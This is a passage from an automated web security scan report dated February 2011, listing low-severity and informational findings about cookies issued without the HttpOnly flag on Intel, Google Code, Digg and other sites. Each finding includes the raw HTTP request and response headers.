Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:17:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:17:54 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=FFJMGNPAIJEEEOOJKAPKMMCC; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

12.112. http://www.intel.com/support/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /support/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/support
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:27 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=PBLMGNPAJLKHIKLEOCNIAMDH; path=/


12.113. http://www.intel.com/technology/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /technology/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business/technology
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:30 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=IDLMGNPAAIMCIBFOEFKLJCND; path=/


12.114. http://www.intel.com/th/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /th/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /th/business/index.htm?iid=gg_th_TH+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_th_TH+noscript
Content-Length: 21
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:19 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=ENKMGNPAPICCNDAAEMFFPIGO; path=/

iid=gg_th_TH+noscript

12.115. http://www.intel.com/th/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /th/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /th/business/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:19 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=KGMFCODAOIPNDJJPKLNMMINE; path=/


12.116. http://www.intel.com/tw/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /tw/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tw/business/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:09 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=BFMFCODAJMIMBANGGBBJIHEF; path=/


12.117. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bu17mduk7is8kedhijahsmb432; expires=Tue, 01-Mar-2011 02:50:35 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 05 Feb 2011 23:16:15 GMT
ETag: "5bc4ba8773ce80095954738aa6226440"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

12.118. http://www.sigcse.org/
 previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sigcse.org
Path:   /<BR/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /<BR/ HTTP/1.1
Host: www.sigcse.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org
Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...

12.119. http://a9.com/-/spec/opensearch/1.1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a9.com
Path:   /-/spec/opensearch/1.1/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • a9locale=en_US; Domain=.a9.com; Path=/
  • a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /-/spec/opensearch/1.1/ HTTP/1.1
Host: a9.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Server
Content-Type: text/html; charset=utf-8
Content-Length: 2727
Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/
Set-Cookie: a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close


<html>
<head>


<script language="javascript" type="text/javascript">
<!--
var a9IsIE7 = true;
var a9IsIE = true;
var a9IsMoz = false;
var a9IsSafari = false;
var a9IsOpera = false;

...[SNIP]...

12.120. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=a7fb3fbbcf17b918:TM=1296947840:LM=1296947840:S=gIUVNf4Re7eiOItb; expires=Mon, 04-Feb-2013 23:17:20 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a7fb3fbbcf17b918:TM=1296947840:LM=1296947840:S=gIUVNf4Re7eiOItb; expires=Mon, 04-Feb-2013 23:17:20 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

12.121. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

12.122. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • traffic_control=1168415921484595456%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
  • d=ecf040374803e538bd55ad8d0e2e3590e4758659323071ed57f7524ccb84e0a0; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=ecf040374803e538bd55ad8d0e2e3590e4758659323071ed57f7524ccb84e0a0; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22082 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3359

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...

12.123. http://downloadcenter.intel.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloadcenter.intel.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • IntelDownloadCenterLocale=en-US; expires=Sun, 05-Feb-2012 23:17:39 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: downloadcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:17:39 GMT
Server: Microsoft-IIS/6.0
P: S1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qsaw3eedfpygrc45av4jmmm4; path=/; HttpOnly
Set-Cookie: IntelDownloadCenterLocale=en-US; expires=Sun, 05-Feb-2012 23:17:39 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22403
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir="
...[SNIP]...

12.124. http://m.youtube.com/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.youtube.com
Path:   /details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
